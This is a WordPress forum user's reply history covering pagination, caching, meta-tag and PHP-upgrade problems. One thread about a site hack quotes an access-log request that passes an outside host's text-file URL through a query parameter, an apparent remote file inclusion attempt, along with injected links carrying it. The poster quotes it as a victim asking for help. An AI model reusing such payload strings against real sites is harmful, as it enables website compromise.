navigadget
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: tag pagination is not workingSolve my problem. My archives.php simply did not have next and previous page links… Why they were not there in the first place I have no idea. So I added this (the navigation div) at the end of the while loop in my archives.php file…
<?php endwhile; ?> <div class="navigation"> <div class="alignleft"><?php next_posts_link('« Older Entries') ?></div> <div class="alignright"><?php previous_posts_link('Newer Entries »') ?></div> </div> <?php else : ?>
Forum: Fixing WordPress
In reply to: wp 2.9.1 sophisticated hackI’ve realized the hijacked links were the cached ones and that’s probably why they wouldn’t show up once I logged in.
I do not have any reason to believe wp-super-cache plugin was the problem but once got rid of that plugin completely my links look normal (maybe clayton can check again ??
I hate how I still do not know what files/database entries are/were causing this.
Forum: Fixing WordPress
In reply to: wp 2.9.1 sophisticated hackWhat should I look for in access logs? I’m not very good this. I see he is using some “go1” to pass the URL in my access logs:
[23/Jan/2010:01:30:38 -0600] “GET /?go1=https://pivot-e-solutions.com/includes/domit/id1.txt?? HTTP/1.1” 403 54923 “-” “Mozilla/5.0”
And there’s some php code there. I searched all my files for “go1” but nothing came up. I searched for go1 using exploit scanner; one hit was something like this:
Blocker Filesystem pattern scan Found string go1 [ABSPATH]/wp-content/cache/wp-cache-7ef8f7e1c52df0895d36dd2b3ef0ed41.html:267
Contexthref=”https://www.mysite.com/index.php/page/2?go1=http%3A%2F%2Fpivot-e-solutions.com%2Fincludes%2Fdomit%2Fid1.txt” ><span class=’older’>Older Entries</span> </div>
Forum: Fixing WordPress
In reply to: [shortcode] text itself shows up in search engine resultsalism you are right. Thank you so much. It is the META description which is filled in by Add-Meta-Tags.
This should’ve been the first thing I checked.
Quick and dirty fix was to modify the plugin file: “add-meta-tags/add-meta-tags.php”
I added this line right before
return $amt_excerpt
$amt_excerpt = preg_replace('/\[adsense\]/', '', $amt_excerpt);
I’m open to suggestions for a better and more permanent fix.
Forum: Fixing WordPress
In reply to: [shortcode] text itself shows up in search engine resultsCould it be because I use a plugin (Google XML Sitemaps) that could notify search engines without executing the [shortcode].
Help please.
Forum: Fixing WordPress
In reply to: hiding categories using wp_list_categoiresHi all,
I do have the same bug. Looks like there’s some activity on that Trac site. It says ‘has-patch’.
Can you explain how to make use of that diff file to patch my site? I’m not familiar with the “Trac” thing. I can only ftp to my site. No shell. Will I have to add the greens, remove the reds manually, then FTP?
Thank you.
Forum: Fixing WordPress
In reply to: extra slash after leaving comment causes 404Still no solution to the extra slash problem. However if you turn off pagination problem goes away. Make sure Settings > Discussion Settings > Break Comments into pages option is not checked.
Forum: Fixing WordPress
In reply to: extra slash after leaving comment causes 404I’ve been googling about this for an hour now but no luck. I also have the same problem for “Older Comments” link when it paginates.
All the way at the bottom of this page for example:
https://www.navigadget.com/index.php/2008/09/26/suunto-x10-giveawayForum: Fixing WordPress
In reply to: extra slash after leaving comment causes 404So I didn’t quite ‘recode’ myself but went ahead downloaded a WP 2.7 capable version of comments.php from the same guy who made my theme. I still get the double slashes problem.
Where should I be looking for this problem?
Forum: Fixing WordPress
In reply to: extra slash after leaving comment causes 404Wow. I must’ve been out of the loop. What does recoding comments.php involve?
Forum: Fixing WordPress
In reply to: My host go to upgrade the php and MySQL version and I AM SCAREDI just tested if my installation would handle hostgator’s upgrade to php5. I added
AddHandler application/x-httpd-php5 .php
to the top of my .htaccess file.It seems to work fine. So I will go ahead and opt-out of hostgator’s auto-update program so they won’t touch my files.
Forum: Fixing WordPress
In reply to: My host go to upgrade the php and MySQL version and I AM SCAREDI’m in the same situation as minimalnet. I think I’ll opt out of their automated php upgrade so they won’t touch my wordpress installation.
Are we sure the latest and greatest WordPress works fine on PHP5 and MySQL5?
Forum: Plugins
In reply to: Show Selected posts in SidebarI’m looking for the same thing. I want to select a few articles from the admin side and have them show in the sidebar.
I don’t want them to be auto-selected like the popularity contest plug-in does.
I want to show posts that I chose. Easy enough. Any plugin for this?
Forum: Fixing WordPress
In reply to: main column before sidebars in source code for SEOThanks for letting me know that I can google for it ?? Anyone feeling more helpful than rudolf?
Forum: Fixing WordPress
In reply to: main column before sidebars in source code for SEOproper link: navigadget. sorry.